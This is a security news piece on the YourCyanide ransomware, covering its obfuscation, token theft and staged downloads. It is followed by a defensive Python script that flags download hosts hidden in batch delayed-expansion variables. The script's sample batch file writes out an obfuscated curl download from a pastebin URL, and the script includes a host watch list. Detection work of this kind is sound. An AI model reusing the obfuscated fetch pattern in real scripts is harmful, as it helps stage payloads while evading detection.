YourCyanide Ransomware Propagates With PasteBin, Discord, Microsoft Links

Published: 23/11/2024   Category: security




The latest iteration of CMD-based ransomware is sophisticated and tricky to detect – and integrates token theft and worming capabilities into its feature set.



A new CMD-based ransomware variant is still under development, but researchers warn that its poisonous combination of multiple layers of obfuscation and the sneaky integration of legitimate service links into its attack make it a potentially formidable threat. 
YourCyanide traces its roots back to the GonnaCope ransomware family, first discovered in April, a new report from the Trend Micro threat hunting team explains. It doesn't actually encrypt anything yet (researchers say that's likely coming soon), but it does rename all targeted files, steal information, and pilfer access tokens from popular applications like Chrome, Discord, and Microsoft Edge. It also self-propagates.
YourCyanide includes a few new tactics, including using PasteBin, Discord, and Microsoft links to download its payload in stages, and hiding behind Enable Delayed Expansion functionality, the analysts note. 
While YourCyanide and its other variants are currently not as impactful as other families, it represents an interesting update to ransomware kits by bundling a worm, a ransomware, and an information stealer into a single mid-tier ransomware framework, the ransomware variant report says. It is also likely that these ransomware variants are in their development stages, making it a priority to detect and block them before they can evolve further and do even more damage.
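For defenders triaging suspicious CMD scripts, the following added example (not from the article or the Trend Micro report) resolves simple delayed-expansion variables before matching download hosts, since a literal string search misses hosts assembled from `!var!` fragments. The host list, function names, and sample script are assumptions constructed for illustration; the article names the services but not hostnames, so Microsoft links are not covered here.

```python
import re

# Assumed watch list; extend it with hostnames taken from the vendor report.
WATCHED_HOSTS = ("pastebin.com", "cdn.discordapp.com", "discord.com")

SET_RE = re.compile(r'^\s*set\s+"?([A-Za-z_]\w*)=([^"\r\n]*)"?\s*$', re.I)
VAR_RE = re.compile(r'!([A-Za-z_]\w*)!')
DELAYED_RE = re.compile(r'setlocal\b.*\benabledelayedexpansion\b', re.I)

def expand_delayed(script):
    """Resolve plain `set name=value` and `!name!` pairs, top to bottom."""
    env, out = {}, []
    for line in script.splitlines():
        # Unknown variables are left as-is so nothing is silently dropped.
        expanded = VAR_RE.sub(
            lambda m: env.get(m.group(1).lower(), m.group(0)), line)
        m = SET_RE.match(expanded)
        if m:
            env[m.group(1).lower()] = m.group(2)  # cmd names are case-insensitive
        out.append(expanded)
    return out

def _hosts_in(lines):
    text = "\n".join(lines).lower()
    return sorted(h for h in WATCHED_HOSTS if h in text)

def triage(script):
    """Return indicators; `hidden_hosts` appear only after expansion."""
    raw = _hosts_in(script.splitlines())
    resolved = _hosts_in(expand_delayed(script))
    return {
        "delayed_expansion": bool(DELAYED_RE.search(script)),
        "bang_refs": len(VAR_RE.findall(script)),
        "hosts_raw": raw,
        "hosts_resolved": resolved,
        "hidden_hosts": sorted(set(resolved) - set(raw)),
    }

# Constructed sample, not taken from any real specimen.
SAMPLE = r'''@echo off
setlocal EnableDelayedExpansion
set "a=past"
set "b=ebin.c"
set "c=om/raw/EXAMPLE"
curl -s https://!a!!b!!c!
'''

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A non-empty `hidden_hosts` alongside `delayed_expansion: True` is the signal worth escalating; substring slicing (`!var:~n,m!`) and nested expansion are not resolved by this sketch.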
